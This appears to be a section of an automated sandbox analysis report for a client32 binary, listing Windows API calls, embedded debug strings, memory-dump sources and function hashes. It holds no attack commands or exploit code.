Similarity
• API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
• String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
• API String ID: 1628406020-2994292602
APIs
  • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
• WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
• <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
• IsA(), xrefs: 1100968D, 110096B5
• e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
• String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 863766397-389219706
APIs
• IsWindow.USER32(0000070B), ref: 110ED02A
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
• SetCursor.USER32(00000000), ref: 110ED0B8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
• String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
• API String ID: 2735369351-763374134
• Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
• Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
• Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
• Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
APIs
• GetClientRect.USER32(00000000,?), ref: 110056DD
• BeginPaint.USER32(?,?), ref: 110056E8
• BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
• EndPaint.USER32(?,?), ref: 1100572F
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 110056C8
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1216912278-2830328467
• Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
• Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
• Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
• Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
APIs
• GetForegroundWindow.USER32(76967AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
• GetCursorPos.USER32(110C032C), ref: 110B94D6
  • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
• PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
• ClientToScreen.USER32(?,110C032C), ref: 110B9516
• SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
• LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
• SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Cursor$RectWindow$ClientForegroundLoadScreen
• String ID:
• API String ID: 3235510773-0
• Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
• Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
• Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
• Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
APIs
• InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• UI.CPP, xrefs: 111399BD
• De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
• "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
• De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
• De-Initing VolumeControl Subsystem..., xrefs: 11139994
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
• String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
• API String ID: 1808733558-973815363
• Opcode ID: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
• Instruction ID: d06095d957dcd957f3f08007483117ab829c543eb00cd4bea9fc0d92cb8d829e
• Opcode Fuzzy Hash: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
• Instruction Fuzzy Hash: 74014979E0955EF7CA00ABF59D41F8AF769DB4163DF100A26E829D2A80FB3561004795
APIs
• InterlockedDecrement.KERNEL32(?), ref: 1100B350
• EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
• EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
• waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
• LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
• _free.LIBCMT ref: 1100B3C8
• _free.LIBCMT ref: 1100B3CE
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 705253285-0
                                                                                                                                                    • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                                    • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                                                                    • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                                    • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
APIs
• InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
• String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
• API String ID: 2776021309-3012761530
• Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
• Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
• Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
• Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
APIs
• _memset.LIBCMT ref: 1101D66E
• LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
• LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
• RegisterClassExA.USER32(00000030), ref: 1101D6F1
• GetLastError.KERNEL32 ref: 1101D6F7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Load$ClassCursorErrorIconLastRegister_memset
• String ID: 0
• API String ID: 430917334-4108050209
• Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
• Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
• Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
• Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
APIs
• LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
• GetSubMenu.USER32(00000000,00000000), ref: 110033C3
• DestroyMenu.USER32(00000000), ref: 110033F2
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
• Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
• Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
• Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
APIs
• PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
• Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
• PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
• WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
• CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
• FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
• String ID:
• API String ID: 2375713580-0
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
• CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
• SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
• WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
• CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
• CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateEventHandle$ObjectSingleThreadWait
• String ID:
• API String ID: 414154005-0
APIs
• __getptd.LIBCMT ref: 111715AE
  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
• __amsg_exit.LIBCMT ref: 111715CE
• __lock.LIBCMT ref: 111715DE
• InterlockedDecrement.KERNEL32(?), ref: 111715FB
• _free.LIBCMT ref: 1117160E
• InterlockedIncrement.KERNEL32(02E616D0), ref: 11171626
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
• API String ID: 3470314060-0
APIs
• SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
• CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
• CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
• WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID:
• API String ID: 2857295742-0
                                                                                                                                                    • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                                                                                    • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                                                                                                    • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                                                                                                    • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                                    • Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                                                                                    • Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
                                                                                                                                                    • Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                                                                                    • Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
  • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
  • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
  • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
• GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
• String ID: Survey$pcicl32.dll$toastImageAndText.png
• API String ID: 2477883239-2305317391
